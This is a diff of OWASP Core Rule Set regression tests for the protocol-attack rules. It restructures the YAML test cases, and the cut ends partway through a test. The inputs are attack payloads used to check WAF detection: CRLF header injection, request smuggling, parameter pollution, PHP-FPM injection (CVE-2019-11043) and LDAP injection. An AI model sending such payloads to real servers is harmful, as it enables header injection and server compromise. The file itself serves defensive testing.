stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cookie: "oreo=munchmuch%0d%0a%0d%0a" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "921130" - - test_title: 921130-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cookie: "oreo=munchmuch%0d%0a%0d%0a" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: id "921130" + - test_id: 3 desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/1.2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2" - version: "HTTP/1.1" - output: - log_contains: id "921130" - - test_title: 921130-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2" + version: "HTTP/1.1" + output: + log_contains: id "921130" + - test_id: 4 desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2" - version: "HTTP/1.1" - output: - log_contains: id "921130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2" + version: "HTTP/1.1" + output: + log_contains: id "921130" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml index 94f0d5fe7..a6b5cade5 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml @@ -1,41 +1,38 @@ --- meta: author: "Christian S.J. Peron, azurit" - enabled: true - name: "921140.yaml" description: "Tests for protocol based attacks" +rule_id: 921140 tests: - - test_title: 921140-1 + - test_id: 1 desc: "HTTP Header Injection Attack via headers" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - SomeHeader: "Headerdata\rInjectedHeader: response_splitting_code" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id:921140" - - test_title: 921140-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + SomeHeader: "Headerdata\rInjectedHeader: response_splitting_code" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id:921140" + - test_id: 2 desc: "HTTP Header Injection Attack via headers" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - SomeHeader: "Headerdata%0dInjectedHeader: response_splitting_code" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id:921140" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + SomeHeader: "Headerdata%0dInjectedHeader: response_splitting_code" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id:921140" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml index 54830c91d..c56c5082a 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml @@ -1,39 +1,36 @@ --- meta: author: "Christian S.J. Peron, azurit" - enabled: true - name: "921150.yaml" description: "Tests for protocol based attacks" +rule_id: 921150 tests: - - test_title: 921150-1 + - test_id: 1 desc: "HTTP Header Injection Attack via payload" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/script.jsp?variableX=bar&variable2=Y&%0d%0restofdata" - version: "HTTP/1.1" - output: - log_contains: "id \"921150\"" - - test_title: 921150-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/script.jsp?variableX=bar&variable2=Y&%0d%0restofdata" + version: "HTTP/1.1" + output: + log_contains: "id \"921150\"" + - test_id: 2 desc: "Status Page Test - Header Injection Attack (CR/LF detected): Send a parameter name that includes %0d%0a (percent-encoded CR-LF)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - method: GET - uri: "/get?parameter%0d%0a=test" - version: HTTP/1.0 - output: - log_contains: id "921150" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: GET + uri: "/get?parameter%0d%0a=test" + version: HTTP/1.0 + output: + log_contains: id "921150" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml index 189302946..8609259e6 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml @@ -1,68 +1,63 @@ --- meta: author: "Paul Beckett, azurit" - enabled: true - name: "921151.yaml" description: "Tests to trigger or not trigger rule 921151" +rule_id: 921151 tests: - - test_title: 921151-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?941151-1=test%0Dnext=more" - version: "HTTP/1.1" - output: - log_contains: "id \"921151\"" - - test_title: 921151-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?941151-1=test%0Dnext=more" + version: "HTTP/1.1" + output: + log_contains: "id \"921151\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?941151-2=test%0Anext=more" - version: "HTTP/1.1" - output: - log_contains: "id \"921151\"" - - test_title: 921151-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?941151-2=test%0Anext=more" + version: "HTTP/1.1" + output: + log_contains: "id \"921151\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?941151-3=test%0A%0Dnext=more" - version: "HTTP/1.1" - output: - log_contains: "id \"921151\"" - - test_title: 921151-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?941151-3=test%0A%0Dnext=more" + version: "HTTP/1.1" + output: + log_contains: "id \"921151\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: '941151-4=test\r\nmore=text' - version: "HTTP/1.1" - output: - no_log_contains: "id \"921151\"" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: '941151-4=test\r\nmore=text' + version: "HTTP/1.1" + output: + no_log_contains: "id \"921151\"" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml index e0dd6f982..269e7a352 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml @@ -1,103 +1,96 @@ --- meta: author: "Christian S.J. Peron, azurit" - enabled: true - name: "921160.yaml" description: "Tests for protocol based attacks" +rule_id: 921160 tests: - - test_title: 921160-1 + - test_id: 1 desc: "HTTP Header Injection Attack via payload: w/header, invalid line break, newlines after key" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0Remote-addr%0d%0d%0d:%20foo.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0Remote-addr%0d%0d%0d:%20foo.bar.com" + version: "HTTP/1.1" + output: + log_contains: id "921160" + - test_id: 2 desc: "HTTP Header Injection Attack via payload: w/header, correct line break, newlines after key" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr%0d%0d%0d:%20foo.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr%0d%0d%0d:%20foo.bar.com" + version: "HTTP/1.1" + output: + log_contains: id "921160" + - test_id: 3 desc: "HTTP Header Injection Attack via payload: w/header" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr:%20foo.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr:%20foo.bar.com" + version: "HTTP/1.1" + output: + log_contains: id "921160" + - test_id: 4 desc: "HTTP Header Injection Attack via payload: w/header, attack explicitly in value rather than key" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&variable2=%0d%0aRemote-addr:%20foo.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/script_rule921160.jsp?variableX=bar&variable2=%0d%0aRemote-addr:%20foo.bar.com" + version: "HTTP/1.1" + output: + log_contains: id "921160" + - test_id: 5 desc: "HTTP Header Injection Attack via payload: w/header, attack explicitly in key rather than value" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&%0d%0aRemote-addr:%20foo.bar.com=Y" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/script_rule921160.jsp?variableX=bar&%0d%0aRemote-addr:%20foo.bar.com=Y" + version: "HTTP/1.1" + output: + log_contains: id "921160" + - test_id: 6 desc: "Status Page Test - simple HTTP header Injection Attack via payload in value" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?foo=%0d%0arefresh:%20www.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?foo=%0d%0arefresh:%20www.bar.com" + version: "HTTP/1.1" + output: + log_contains: id "921160" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml index a4c10816b..6af9701df 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml @@ -1,103 +1,96 @@ --- meta: author: "jptosso, azurit" - enabled: true - name: "921180.yaml" description: "Tests to trigger, or not trigger 921170 and 921180" +rule_id: 921180 tests: - # Standard GET request - test_title: 921180-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza" - version: "HTTP/1.1" - output: - no_log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza" + version: "HTTP/1.1" + output: + no_log_contains: "id \"921180\"" - # Standard GET request - test_title: 921180-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza&pizza=pineapple" - version: "HTTP/1.1" - output: - no_log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza&pizza=pineapple" + version: "HTTP/1.1" + output: + no_log_contains: "id \"921180\"" - # Standard GET request (Negative, no args) - test_title: 921180-3 + test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id \"921180\"" - # HPP payload - test_title: 921180-4 + test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza&pineapple=aint-pizza" - version: "HTTP/1.1" - output: - log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza&pineapple=aint-pizza" + version: "HTTP/1.1" + output: + log_contains: "id \"921180\"" - # Similar arg names - test_title: 921180-5 + test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza&pineapple2=aint-pizza" - version: "HTTP/1.1" - output: - no_log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza&pineapple2=aint-pizza" + version: "HTTP/1.1" + output: + no_log_contains: "id \"921180\"" - # HPP payload with multiple iterations - test_title: 921180-6 + test_id: 6 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza&pineapple=aint-pizza&pineapple=is-pizza&pineapple=aint-pizza2" - version: "HTTP/1.1" - output: - log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza&pineapple=aint-pizza&pineapple=is-pizza&pineapple=aint-pizza2" + version: "HTTP/1.1" + output: + log_contains: "id \"921180\"" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml index b92fc6b0a..3176f6c5c 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml @@ -2,66 +2,61 @@ meta: author: "Andrea Menin (theMiddle), azurit" description: "HTTP Splitting" - enabled: true - name: 921190.yaml +rule_id: 921190 tests: - - test_title: 921190-1 + - test_id: 1 desc: "New line char in request filename (1)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/foo%0Abar" - version: "HTTP/1.1" - output: - log_contains: id "921190" - - test_title: 921190-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/foo%0Abar" + version: "HTTP/1.1" + output: + log_contains: id "921190" + - test_id: 2 desc: "New line char in request filename (2)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/foo%0abar" - version: "HTTP/1.1" - output: - log_contains: id "921190" - - test_title: 921190-3 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/foo%0abar" + version: "HTTP/1.1" + output: + log_contains: id "921190" + - test_id: 3 desc: "FastCGI variable injection: Nginx + PHP-FPM (CVE-2019-11043)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/index.php/PHP%0Ainfo.php?QQQ" - version: "HTTP/1.1" - output: - log_contains: id "921190" - - test_title: 921190-4 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/index.php/PHP%0Ainfo.php?QQQ" + version: "HTTP/1.1" + output: + log_contains: id "921190" + - test_id: 4 desc: "PHP Settings injection: Nginx + PHP-FPM (CVE-2019-11043)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/index.php/PHP_VALUE%0Asession.auto_start=1;;;?QQQ" - version: "HTTP/1.1" - output: - log_contains: id "921190" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/index.php/PHP_VALUE%0Asession.auto_start=1;;;?QQQ" + version: "HTTP/1.1" + output: + log_contains: id "921190" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml index 13b3dc180..70e89f148 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml @@ -2,176 +2,165 @@ meta: author: "Christian Folini, azurit" description: "LDAP injection" - enabled: true - name: 921200.yaml +rule_id: 921200 tests: - - test_title: 921200-1 + - test_id: 1 desc: "Testing for FP, this should not trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: POST - data: "foo=(%26(objectCategory=computer) (userAccountControl:1.2.840.113556.1.4.803:=8192))" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: id "921200" - - test_title: 921200-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: POST + data: "foo=(%26(objectCategory=computer) (userAccountControl:1.2.840.113556.1.4.803:=8192))" + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: id "921200" + - test_id: 2 desc: "Testing for FP, this should not trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: POST - data: "foo=(objectSID=S-1-5-21-73586283-152049171-839522115-1111)" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: id "921200" - - test_title: 921200-3 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: POST + data: "foo=(objectSID=S-1-5-21-73586283-152049171-839522115-1111)" + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: id "921200" + - test_id: 3 desc: "Testing for FP, this should not trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: POST - data: "foo=(userAccountControl:1.2.840.113556.1.4.803:=67108864)(%26(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=2147483648))" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: id "921200" - - test_title: 921200-4 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: POST + data: "foo=(userAccountControl:1.2.840.113556.1.4.803:=67108864)(%26(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=2147483648))" + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: id "921200" + - test_id: 4 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=bar)(%26)" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-5 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=bar)(%26)" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log_contains: id "921200" + - test_id: 5 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - 